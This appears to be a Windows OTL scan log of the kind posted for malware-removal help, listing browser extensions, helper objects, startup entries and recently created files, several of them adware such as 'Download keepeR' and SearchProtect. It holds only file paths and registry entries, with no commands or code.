CHR - Extension: avast! Online Security = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2005.45_0\
CHR - Extension: Google Wallet = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Gmail = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
CHR - Extension: Google Drive = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: avast! Online Security = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2005.45_0\
CHR - Extension: Google Wallet = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Gmail = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2013/12/06 14:52:24 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2:64bit: - BHO: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O2:64bit: - BHO: (Download keepeR) - {69E81F82-21F6-0F27-3F07-7DA9AD036591} - C:\Program Files (x86)\Download keepeR\SwGMzO4Dk.x64.dll ()
O2:64bit: - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
O2:64bit: - BHO: (suruf annda kEeep) - {F729CB91-1992-90F3-379A-968BF1A4F836} - C:\Program Files (x86)\suruf annda kEeep\M92hU.x64.dll ()
O2 - BHO: (TBSB06948 Class) - {2C776F39-2849-4D43-AEF3-C2F8476BC90A} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (DivX HiQ) - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O3:64bit: - HKLM\..\Toolbar: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (Multimedia Toolbar) - {968B9C5F-9D79-3863-CF0A-0E80D812E4C5} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:[b]64bit:
- HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AdobeCS5ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [AVG_UI] C:\Program Files (x86)\AVG\AVG2013\avgui.exe (AVG Technologies CZ, s.r.o.)
O4 - HKLM..\Run: [CloneCDTray] C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe (SlySoft, Inc.)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe (Symantec Corporation)
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
O4 - HKCU..\Run: [BackgroundContainer] C:\Users\Jon Lowry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll (Conduit Ltd.)
O4 - HKCU..\Run: [DownBook] C:\Users\Jon Lowry\AppData\Local\DownBook\DownBook.exe ()
O4 - HKCU..\Run: [Facebook Update] C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O4 - Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk = File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8:[b]64bit:
- Extra context menu item: MasterCook: Select Image - C:\Program Files (x86)\MasterCook 9\Web\MCIEContext.hta ()
O8 - Extra context menu item: MasterCook: Select Image - C:\Program Files (x86)\MasterCook 9\Web\MCIEContext.hta ()
O9:[b]64bit:
- Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit:
- Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O12 - Plugin for: .spop - C:\Program Files (x86)\Internet Explorer\Plugins\NPDocBox.dll (Intertrust Technologies, Inc.)
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: sony.com ([]* in Trusted sites)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2ECEE45-E66C-43D0-BF61-9B61E89D0E19}: DhcpNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E73B43AB-B625-4EF7-932A-B128EF0F8391}: DhcpNameServer = 192.168.15.1
O18:[b]64bit:
- Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msdaipp - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-help - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:[b]64bit:
- HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/02/07 00:44:47 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (�盍)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = ComFile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2013/12/06 15:41:09 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
[2013/12/06 15:39:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast
[2013/12/06 15:39:15 | 001,032,416 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSnx.sys
[2013/12/06 15:39:15 | 000,409,832 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSP.sys
[2013/12/06 15:39:15 | 000,092,544 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2013/12/06 15:39:15 | 000,084,328 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2013/12/06 15:39:15 | 000,065,264 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswTdi.sys
[2013/12/06 15:39:15 | 000,038,984 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswFsBlk.sys
[2013/12/06 15:39:13 | 000,334,648 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2013/12/06 15:39:03 | 000,043,152 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr
[2013/12/06 15:38:05 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/12/06 15:36:30 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2013/12/06 15:11:48 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2013/12/06 15:09:57 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
[2013/12/06 14:52:35 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2013/12/06 00:09:53 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\cache
[2013/12/06 00:09:49 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\Mobogenie
[2013/12/06 00:09:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mobogenie
[2013/12/06 00:08:56 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\SwvUpdater
[2013/12/06 00:07:56 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\NativeMessaging
[2013/12/06 00:07:17 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2013/12/06 00:05:32 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\BeamriseUninstall
[2013/12/06 00:04:40 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SecretSauce
[2013/12/06 00:03:56 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TornTV.com
[2013/12/06 00:03:56 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\TornTV.com
[2013/12/05 23:56:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong
[2013/12/04 14:13:33 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Multimedia Toolbar
[2013/12/02 22:13:16 | 000,000,000 | R--D | C] -- C:\Users\Jon Lowry\Documents\Scanned Documents
[2013/12/02 22:13:16 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\Documents\Fax
[2013/12/02 14:12:27 | 000,000,000 | ---D | C] -- C:\ProgramData\ssurf aNdo keep
[2013/12/02 14:12:27 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ssurf aNdo keep
[2013/12/02 14:06:56 | 000,000,000 | ---D | C] -- C:\ProgramData\suruf annda kEeep
[2013/12/02 14:06:56 | 000,000,000 | ---D | C] -- C:\ProgramData\QuickSet
[2013/12/02 14:06:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\suruf annda kEeep
[2013/11/29 23:24:07 | 000,000,000 | ---D | C] -- C:\Temp
[2013/11/29 22:56:08 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\RsFx
[2013/11/29 22:55:20 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Visual Studio 9.0
[2013/11/29 22:55:11 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 9.0
[2013/11/29 22:54:51 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\1033
[2013/11/29 22:54:51 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\1033
[2013/11/29 22:53:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008
[2013/11/29 22:48:55 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Synchronization Services
[2013/11/29 22:48:55 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SQL Server Compact Edition
[2013/11/29 22:48:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Synchronization Services
[2013/11/29 22:46:35 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\Documents\Visual Studio 2010
[2013/11/29 22:46:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2010 Express
[2013/11/29 22:44:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Visual Studio 10.0
[2013/11/29 22:43:36 | 000,000,000 | ---D | C] -- C:\Windows\symbols
[2013/11/29 22:43:36 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 10.0
[2013/11/29 22:43:35 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft SDKs
[2013/11/29 22:43:35 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Help Viewer
[2013/11/27 00:33:37 | 000,000,000 | ---D | C] -- C:\Recovery
[2013/11/26 00:25:44 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\{7971B3C8-800C-4FBF-8383-5849DE5E2F91}
[2013/11/26 00:25:31 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinX DVD Author
[2013/11/26 00:25:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Digiarty
[2013/11/20 21:50:07 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Roaming\SketchUp
[2013/11/18 15:19:19 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\{63970F83-30D3-4095-BB92-736E6CC50423}
[2013/11/15 14:20:37 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\LogMeIn Rescue Applet
[2013/11/15 13:49:50 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\Design Era Samples
[2013/11/15 13:49:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stitch Era Universal
[2013/11/15 13:46:34 | 000,125,440 | ---- | C] (Inner Media, Inc.) -- C:\Windows\SysWow64\DZIP32.DLL
[2013/11/15 13:46:34 | 000,098,304 | ---- | C] (Inner Media, Inc.) -- C:\Windows\SysWow64\DUNZIP32.DLL
[2013/11/15 13:46:34 | 000,006,144 | ---- | C] (Erik Salaj) -- C:\Windows\SysWow64\drivers\IOPORT.SYS
[2013/11/15 13:46:29 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Sierra
[2013/11/15 13:45:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Sierra
[2013/11/15 13:01:28 | 000,005,632 | ---- | C] (Erik Salaj) -- C:\Windows\SysWow64\drivers\MEMPORT.SYS
[2013/11/15 13:01:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Sierra
[2012/12/22 19:20:34 | 000,082,816 | ---- | C] (VSO Software) -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.sys
[1 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/12/06 15:39:44 | 000,001,966 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2013/12/06 15:39:06 | 000,205,320 | ---- | M] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2013/12/06 15:39:06 | 000,065,264 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswTdi.sys
[2013/12/06 15:39:05 | 001,032,416 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSnx.sys
[2013/12/06 15:39:05 | 000,409,832 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSP.sys
[2013/12/06 15:39:05 | 000,334,648 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2013/12/06 15:39:05 | 000,084,328 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2013/12/06 15:39:05 | 000,065,776 | ---- | M] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2013/12/06 15:39:05 | 000,038,984 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswFsBlk.sys
[2013/12/06 15:39:04 | 000,092,544 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2013/12/06 15:39:03 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr
[2013/12/06 15:19:00 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013/12/06 15:14:43 | 000,000,071 | ---- | M] () -- C:\Windows\avast5.ini
[2013/12/06 15:13:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013/12/06 15:09:59 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
[2013/12/06 15:00:39 | 000,023,248 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2013/12/06 15:00:39 | 000,023,248 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2013/12/06 14:59:59 | 000,002,279 | ---- | M] () -- C:\Users\Jon Lowry\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/12/06 14:59:59 | 000,002,255 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Google Chrome.lnk
[2013/12/06 14:52:24 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2013/12/06 14:52:23 | 000,000,900 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013/12/06 14:52:08 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013/12/06 14:52:02 | 3062,255,616 | -HS- | M] () -- C:\hiberfil.sys
[2013/12/06 00:04:27 | 000,001,109 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2013/12/06 00:00:36 | 000,000,960 | ---- | M] () -- C:\Users\Public\Desktop\calibre - E-book management.lnk
[2013/12/05 23:27:01 | 000,000,944 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA.job
[2013/12/05 15:46:30 | 000,181,817 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Allegiant Search _ Allegiant Air.pdf
[2013/12/05 13:21:31 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2013/12/04 14:27:01 | 000,000,922 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core.job
[2013/12/02 22:11:08 | 000,172,693 | ---- | M] () -- C:\Windows\hpoins46.dat.temp
[2013/12/02 22:11:08 | 000,172,693 | ---- | M] () -- C:\Windows\hpoins46.dat
[2013/12/02 21:50:43 | 000,000,348 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForJon Lowry.job
[2013/12/02 14:13:16 | 003,766,994 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2013/12/02 14:13:16 | 001,207,724 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2013/12/02 14:13:16 | 000,006,710 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2013/11/26 00:25:31 | 000,001,227 | ---- | M] () -- C:\Users\Public\Desktop\WinX DVD Author.lnk
[2013/11/16 16:28:03 | 000,675,988 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Minecraft.exe
[2013/11/15 13:49:50 | 000,001,991 | ---- | M] () -- C:\Users\Public\Desktop\SEU Explorer.lnk
[2013/11/15 13:49:50 | 000,001,938 | ---- | M] () -- C:\Users\Public\Desktop\SEU Design.lnk
[1 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/12/06 15:39:44 | 000,001,966 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2013/12/06 15:39:15 | 000,205,320 | ---- | C] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2013/12/06 15:39:15 | 000,065,776 | ---- | C] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2013/12/06 14:59:59 | 000,002,255 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Google Chrome.lnk
[2013/12/06 14:53:43 | 000,000,071 | ---- | C] () -- C:\Windows\avast5.ini
[2013/12/06 00:04:27 | 000,001,109 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2013/12/05 15:46:30 | 000,181,817 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Allegiant Search _ Allegiant Air.pdf
[2013/12/02 22:10:54 | 000,172,693 | ---- | C] () -- C:\Windows\hpoins46.dat
[2013/12/02 22:10:54 | 000,000,532 | ---- | C] () -- C:\Windows\hpomdl46.dat
[2013/11/26 00:25:31 | 000,001,227 | ---- | C] () -- C:\Users\Public\Desktop\WinX DVD Author.lnk
[2013/11/16 16:28:00 | 000,675,988 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Minecraft.exe
[2013/11/15 13:49:50 | 000,001,991 | ---- | C] () -- C:\Users\Public\Desktop\SEU Explorer.lnk
[2013/11/15 13:49:50 | 000,001,938 | ---- | C] () -- C:\Users\Public\Desktop\SEU Design.lnk
[2013/11/15 13:49:23 | 000,000,042 | ---- | C] () -- C:\Windows\BDNET32.INI
[2013/04/12 10:31:30 | 000,234,280 | ---- | C] () -- C:\Windows\ngmsi.dll
[2013/04/12 10:30:42 | 000,020,776 | ---- | C] () -- C:\Windows\ngutil.exe
[2013/02/07 00:20:05 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2013/02/07 00:20:05 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2013/02/07 00:20:05 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2013/02/07 00:20:05 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2013/02/07 00:20:05 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2013/01/11 14:12:08 | 000,085,504 | ---- | C] () -- C:\Windows\SysWow64\ff_vfw.dll
[2013/01/04 20:12:28 | 000,006,144 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/12/28 16:23:06 | 000,000,049 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE2.dat
[2012/12/28 16:21:45 | 000,000,050 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_loginapplet_LIVE.dat
[2012/12/28 16:21:45 | 000,000,024 | ---- | C] () -- C:\Users\Jon Lowry\random.dat
[2012/12/28 16:20:04 | 000,000,049 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE1.dat
[2012/12/22 19:20:34 | 000,007,859 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.cat
